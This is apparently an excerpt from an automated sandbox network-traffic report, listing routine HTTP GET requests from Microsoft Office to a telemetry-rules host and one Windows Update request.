              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hAemhKkDt5V6+5V&MD=5xMo73yv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
